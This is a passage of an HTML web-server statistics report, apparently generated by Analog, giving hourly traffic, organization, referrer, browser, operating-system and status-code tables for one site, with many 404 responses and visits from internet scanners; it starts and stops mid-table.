/></td></tr> <tr><td class="x">Sat</td><td class="R">126</td><td class="P">75</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> </tbody></table> </div><div class="hoursum"><h2><a name="hoursum" id="hoursum">Hourly Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | Hourly Summary | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="eachunit">Each unit (<img src="/images/barb1.png" alt="+" />) represents 1 request for a page.</p> <table> <thead><tr><th class="x">hour</th><th class="R">#reqs</th><th class="P">#pages</th><th class="bar"> </th></tr></thead> <tbody><tr><td class="x"> 0</td><td class="R">30</td><td class="P">20</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /></td></tr> <tr><td class="x"> 1</td><td class="R">25</td><td class="P">21</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x"> 2</td><td class="R">17</td><td class="P">16</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++" /></td></tr> <tr><td class="x"> 3</td><td class="R">117</td><td class="P">43</td><td class="bar"><img src="/images/barb32.png" alt="+++++++++++++++++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x"> 4</td><td class="R">48</td><td class="P">39</td><td class="bar"><img src="/images/barb32.png" alt="+++++++++++++++++++++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x"> 5</td><td class="R">16</td><td class="P">12</td><td class="bar"><img src="/images/barb8.png" alt="++++++++++++" /><img src="/images/barb4.png" alt="" /></td></tr> <tr><td class="x"> 6</td><td class="R">15</td><td class="P">13</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x"> 7</td><td class="R">21</td><td class="P">20</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /></td></tr> <tr><td class="x"> 8</td><td class="R">17</td><td class="P">17</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x"> 9</td><td class="R">48</td><td class="P">25</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">10</td><td class="R">27</td><td class="P">26</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">11</td><td class="R">22</td><td class="P">19</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">12</td><td class="R">22</td><td class="P">19</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">13</td><td class="R">28</td><td class="P">24</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /></td></tr> <tr><td class="x">14</td><td class="R">45</td><td class="P">40</td><td class="bar"><img src="/images/barb32.png" alt="++++++++++++++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /></td></tr> <tr><td class="x">15</td><td class="R">59</td><td class="P">34</td><td class="bar"><img src="/images/barb32.png" alt="++++++++++++++++++++++++++++++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">16</td><td class="R">61</td><td class="P">39</td><td class="bar"><img src="/images/barb32.png" alt="+++++++++++++++++++++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">17</td><td class="R">60</td><td class="P">28</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb4.png" alt="" /></td></tr> <tr><td class="x">18</td><td class="R">23</td><td class="P">14</td><td class="bar"><img src="/images/barb8.png" alt="++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">19</td><td class="R">63</td><td class="P">26</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">20</td><td class="R">32</td><td class="P">26</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">21</td><td class="R">12</td><td class="P">12</td><td class="bar"><img src="/images/barb8.png" alt="++++++++++++" /><img src="/images/barb4.png" alt="" /></td></tr> <tr><td class="x">22</td><td class="R">64</td><td class="P">39</td><td class="bar"><img src="/images/barb32.png" alt="+++++++++++++++++++++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">23</td><td class="R">24</td><td class="P">20</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /></td></tr> </tbody></table> </div><div class="dom"><h2><a name="dom" id="dom">Domain Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | Domain Report | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="whatinc"> Listing domains, sorted by the amount of traffic.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">domain</th></tr></thead> <tbody><tr><td class="R">896</td><td class="b">100%</td><td class="xl">[unresolved numerical addresses]</td></tr> </tbody></table> </div><div class="org"><h2><a name="org" id="org">Organization Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | Organization Report | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./org.png" alt="" /></p> <p class="whatinc"> Listing the top 20 organizations by the number of requests, sorted by the number of requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">organization</th></tr></thead> <tbody><tr><td class="R">91</td><td class="b"> 7.65%</td><td class="xl">205.169</td></tr> <tr><td class="R">82</td><td class="b"> 7.30%</td><td class="xl">34</td></tr> <tr><td class="R">59</td><td class="b">37.92%</td><td class="xl">20</td></tr> <tr><td class="R">45</td><td class="b"> 2.56%</td><td class="xl">3</td></tr> <tr><td class="R">34</td><td class="b"> 1.85%</td><td class="xl">167.94</td></tr> <tr><td class="R">33</td><td class="b"> 2.33%</td><td class="xl">35</td></tr> <tr><td class="R">32</td><td class="b"> 2.86%</td><td class="xl">54</td></tr> <tr><td class="R">31</td><td class="b"> 2.70%</td><td class="xl">27</td></tr> <tr><td class="R">27</td><td class="b"> 3.00%</td><td class="xl">205.210</td></tr> <tr><td class="R">27</td><td class="b"> 2.22%</td><td class="xl">44</td></tr> <tr><td class="R">21</td><td class="b"> 2.36%</td><td class="xl">198.235</td></tr> <tr><td class="R">17</td><td class="b"> 0.12%</td><td class="xl">194.87</td></tr> <tr><td class="R">16</td><td class="b"> 0.75%</td><td class="xl">104</td></tr> <tr><td class="R">15</td><td class="b"> 0.74%</td><td class="xl">206.168</td></tr> <tr><td class="R">14</td><td class="b"> 0.76%</td><td class="xl">199.45</td></tr> <tr><td class="R">13</td><td class="b"> 0.65%</td><td class="xl">18</td></tr> <tr><td class="R">12</td><td class="b"> 0.89%</td><td class="xl">185.177</td></tr> <tr><td class="R">11</td><td class="b"> 1.18%</td><td class="xl">45</td></tr> <tr><td class="R">11</td><td class="b"> 0.81%</td><td class="xl">64.227</td></tr> <tr><td class="R">10</td><td class="b"> 0.86%</td><td class="xl">123</td></tr> <tr><td class="R">295</td><td class="b">20.50%</td><td class="xl">[not listed: 102 organizations]</td></tr> </tbody></table> </div><div class="failref"><h2><a name="failref" id="failref">Failed Referrer Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | Failed Referrer Report | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./failref.png" alt="" /></p> <p class="whatinc"> Listing referring URLs, sorted by the number of failed requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="xl">URL</th></tr></thead> <tbody><tr><td class="R">252</td><td class="xl"><a href="https://www.google.com/">https://www.google.com/</a></td></tr> <tr><td class="R">60</td><td class="xl"><a href="http://www.account.imators.com/">http://www.account.imators.com/</a></td></tr> <tr><td class="R">29</td><td class="xl"><a href="http://account.imators.com/">http://account.imators.com/</a></td></tr> <tr><td class="R">5</td><td class="xl"><a href="https://www.accelerategreatschools.org//wp-login.php">https://www.accelerategreatschools.org//wp-login.php</a></td></tr> <tr><td class="R">2</td><td class="xl"><a href="www.google.comhttps://t.me/optimasprimetools">www.google.comhttps://t.me/optimasprimetools</a></td></tr> <tr><td class="R">1</td><td class="xl"><a href="http://www.account.imators.com/cgi-bin">http://www.account.imators.com/cgi-bin</a></td></tr> </tbody></table> </div><div class="refsite"><h2><a name="refsite" id="refsite">Referring Site Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | Referring Site Report | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./refsite.png" alt="" /></p> <p class="whatinc"> Listing referring sites, sorted by the number of requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="xl">site</th></tr></thead> <tbody><tr><td class="R">82</td><td class="xl">http://www.account.imators.com/</td></tr> <tr><td class="R">62</td><td class="xl">http://account.imators.com/</td></tr> <tr><td class="R">9</td><td class="xl">https://www.google.com/</td></tr> <tr><td class="R">1</td><td class="xl">https://www.accelerategreatschools.org/</td></tr> <tr><td class="R">1</td><td class="xl">https://www.google.it/</td></tr> </tbody></table> </div><div class="browrep"><h2><a name="browrep" id="browrep">Browser Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | Browser Report | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./browrep.png" alt="" /></p> <p class="whatinc"> Listing the top 40 browsers by the number of requests for pages, sorted by the number of requests for pages.</p> <table> <thead><tr><th class="R">#reqs</th><th class="P">#pages</th><th class="xl">browser</th></tr></thead> <tbody><tr><td class="R">72</td><td class="P">72</td><td class="xl">Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)</td></tr> <tr><td class="R">47</td><td class="P">47</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36</td></tr> <tr><td class="R">31</td><td class="P">31</td><td class="xl">Mozilla/5.0 (compatible)</td></tr> <tr><td class="R">59</td><td class="P">19</td><td class="xl">Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)</td></tr> <tr><td class="R">18</td><td class="P">18</td><td class="xl">Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36</td></tr> <tr><td class="R">19</td><td class="P">17</td><td class="xl">Go-http-client/1.1</td></tr> <tr><td class="R">17</td><td class="P">17</td><td class="xl">Mozilla/5.0 (compatible; CMS-Checker/1.0; +https://example.com)</td></tr> <tr><td class="R">15</td><td class="P">15</td><td class="xl">Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity</td></tr> <tr><td class="R">13</td><td class="P">13</td><td class="xl">Mozilla/5.0 zgrab/0.x</td></tr> <tr><td class="R">12</td><td class="P">12</td><td class="xl">Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)</td></tr> <tr><td class="R">11</td><td class="P">11</td><td class="xl">Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)</td></tr> <tr><td class="R">10</td><td class="P">10</td><td class="xl">Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36</td></tr> <tr><td class="R">11</td><td class="P">9</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36</td></tr> <tr><td class="R">9</td><td class="P">9</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36</td></tr> <tr><td class="R">9</td><td class="P">9</td><td class="xl">Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36</td></tr> <tr><td class="R">41</td><td class="P">9</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36</td></tr> <tr><td class="R">8</td><td class="P">8</td><td class="xl">Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36</td></tr> <tr><td class="R">7</td><td class="P">7</td><td class="xl">Mozilla/5.0 (Linux; Android 6.0; HTC One M9 Build/MRA540537) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.3260.98 Mobile Safari/537.3</td></tr> <tr><td class="R">7</td><td class="P">7</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3</td></tr> <tr><td class="R">6</td><td class="P">6</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36</td></tr> <tr><td class="R">18</td><td class="P">6</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.3; rb.gy/qyzae5) Chrome/124.0.0.0 Safari/537.36</td></tr> <tr><td class="R">26</td><td class="P">6</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36</td></tr> <tr><td class="R">6</td><td class="P">6</td><td class="xl">Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11</td></tr> <tr><td class="R">6</td><td class="P">6</td><td class="xl">Mozilla/5.0 (X11; Linux x86_64; rv:137.0) Gecko/20100101 Firefox/137.0</td></tr> <tr><td class="R">16</td><td class="P">6</td><td class="xl">Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36</td></tr> <tr><td class="R">20</td><td class="P">5</td><td class="xl">Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36</td></tr> <tr><td class="R">5</td><td class="P">5</td><td class="xl">Mozilla/5.0</td></tr> <tr><td class="R">5</td><td class="P">5</td><td class="xl">Mozilla/5.0 (X11; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0</td></tr> <tr><td class="R">5</td><td class="P">5</td><td class="xl">Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36</td></tr> <tr><td class="R">20</td><td class="P">4</td><td class="xl">Mozilla/5.0 (Linux; U; Android 8.1.0; zh-cn; MI 8 Build/OPM1.171019.011) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.108 Mobile Safari/537.36</td></tr> <tr><td class="R">4</td><td class="P">4</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36</td></tr> <tr><td class="R">4</td><td class="P">4</td><td class="xl">Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0</td></tr> <tr><td class="R">4</td><td class="P">4</td><td class="xl">Mozilla/5.0 (X11; Linux x86_64; rv:139.0) Gecko/20100101 Firefox/139.0</td></tr> <tr><td class="R">20</td><td class="P">4</td><td class="xl">Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/125.0.6422.60 Safari/537.36</td></tr> <tr><td class="R">4</td><td class="P">4</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4859.172 Safari/537.36</td></tr> <tr><td class="R">4</td><td class="P">4</td><td class="xl">Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0</td></tr> <tr><td class="R">12</td><td class="P">4</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19582</td></tr> <tr><td class="R">4</td><td class="P">4</td><td class="xl">curl/7.88.1</td></tr> <tr><td class="R">4</td><td class="P">4</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36</td></tr> <tr><td class="R">4</td><td class="P">4</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36</td></tr> <tr><td class="R">234</td><td class="P">103</td><td class="xl">[not listed: 88 browsers]</td></tr> </tbody></table> </div><div class="browsum"><h2><a name="browsum" id="browsum">Browser Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | Browser Summary | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./browsum.png" alt="" /></p> <p class="whatinc"> Listing browsers with at least 1 request for a page, sorted by the number of requests for pages.</p> <table> <thead><tr><th class="N"> #</th><th class="R">#reqs</th><th class="P">#pages</th><th class="xl">browser</th></tr></thead> <tbody><tr><td class="N">1</td><td class="R">453</td><td class="P">270</td><td class="xl">Safari</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">431</td><td class="P">256</td><td class="xl"> Safari/537</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">6</td><td class="P">6</td><td class="xl"> Safari/535</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">13</td><td class="P">5</td><td class="xl"> Safari/604</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">2</td><td class="P">2</td><td class="xl"> Safari/605</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">1</td><td class="P">1</td><td class="xl"> Safari/614</td></tr> <tr><td class="N">2</td><td class="R">238</td><td class="P">164</td><td class="xl">Netscape (compatible)</td></tr> <tr><td class="N">3</td><td class="R">39</td><td class="P">38</td><td class="xl">Firefox</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">7</td><td class="P">7</td><td class="xl"> Firefox/139</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">6</td><td class="P">6</td><td class="xl"> Firefox/137</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">5</td><td class="P">5</td><td class="xl"> Firefox/136</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">4</td><td class="P">4</td><td class="xl"> Firefox/24</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">4</td><td class="P">4</td><td class="xl"> Firefox/65</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">4</td><td class="P">4</td><td class="xl"> Firefox/134</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">2</td><td class="P">2</td><td class="xl"> Firefox/13</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">1</td><td class="P">1</td><td class="xl"> Firefox/46</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">1</td><td class="P">1</td><td class="xl"> Firefox/78</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">1</td><td class="P">1</td><td class="xl"> Firefox/89</td></tr> <tr><td class="N">4</td><td class="R">32</td><td class="P">25</td><td class="xl">Mozilla</td></tr> <tr><td class="N">5</td><td class="R">19</td><td class="P">17</td><td class="xl">Go-http-client</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">19</td><td class="P">17</td><td class="xl"> Go-http-client/1</td></tr> <tr><td class="N">6</td><td class="R">15</td><td class="P">15</td><td class="xl">Hello from Palo Alto Networks, find out more about our scans in https:</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">15</td><td class="P">15</td><td class="xl"> Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex</td></tr> <tr><td class="N">7</td><td class="R">4</td><td class="P">4</td><td class="xl">curl</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">4</td><td class="P">4</td><td class="xl"> curl/7</td></tr> <tr><td class="N">8</td><td class="R">4</td><td class="P">4</td><td class="xl">python-requests</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">4</td><td class="P">4</td><td class="xl"> python-requests/2</td></tr> <tr><td class="N">9</td><td class="R">4</td><td class="P">4</td><td class="xl">MSIE</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">4</td><td class="P">4</td><td class="xl"> MSIE/6</td></tr> <tr><td class="N">10</td><td class="R">22</td><td class="P">2</td><td class="xl">python-httpx</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">22</td><td class="P">2</td><td class="xl"> python-httpx/0</td></tr> <tr><td class="N"> </td><td class="R">17</td><td class="P">0</td><td class="xl">[not listed: 2 browsers]</td></tr> </tbody></table> </div><div class="os"><h2><a name="os" id="os">Operating System Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | Operating System Report | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./os.png" alt="" /></p> <p class="whatinc"> Listing operating systems, sorted by the number of requests for pages.</p> <table> <thead><tr><th class="N"> #</th><th class="R">#reqs</th><th class="P">#pages</th><th class="xl">OS</th></tr></thead> <tbody><tr><td class="N">1</td><td class="R">337</td><td class="P">224</td><td class="xl">OS unknown</td></tr> <tr><td class="N">2</td><td class="R">259</td><td class="P">165</td><td class="xl">Windows</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">237</td><td class="P">153</td><td class="xl"> Windows NT</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">22</td><td class="P">12</td><td class="xl"> Unknown Windows</td></tr> <tr><td class="N">3</td><td class="R">177</td><td class="P">113</td><td class="xl">Unix</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">176</td><td class="P">112</td><td class="xl"> Linux</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">1</td><td class="P">1</td><td class="xl"> Other Unix</td></tr> <tr><td class="N">4</td><td class="R">74</td><td class="P">41</td><td class="xl">Macintosh</td></tr> </tbody></table> </div><div class="code"><h2><a name="code" id="code">Status Code Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | Status Code Report | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./code.png" alt="" /></p> <p class="whatinc"> Listing status codes, sorted numerically.</p> <table> <thead><tr><th class="R">#reqs</th><th class="xl">status code</th></tr></thead> <tbody><tr><td class="R">896</td><td class="xl">200 OK</td></tr> <tr><td class="R">2</td><td class="xl">301 Document moved permanently</td></tr> <tr><td class="R">17</td><td class="xl">302 Document found elsewhere</td></tr> <tr><td class="R">137</td><td class="xl">403 Access forbidden</td></tr> <tr><td class="R">5208</td><td class="xl">404 Document not found</td></tr> <tr><td class="R">1</td><td class="xl">500 Internal server error</td></tr> </tbody></table> </div><div class="size"><h2><a name="size" id="size">File Size Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | File Size Report | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./size.png" alt="" /></p> <table> <thead><tr><th class="x">size</th><th class="R">#reqs</th><th class="b">%bytes</th></tr></thead> <tbody><tr><td class="x"> 0</td><td class="R">8</td><td class="b"> </td></tr> <tr><td class="x"> 1B- 10B</td><td class="R">0</td><td class="b"> </td></tr> <tr><td 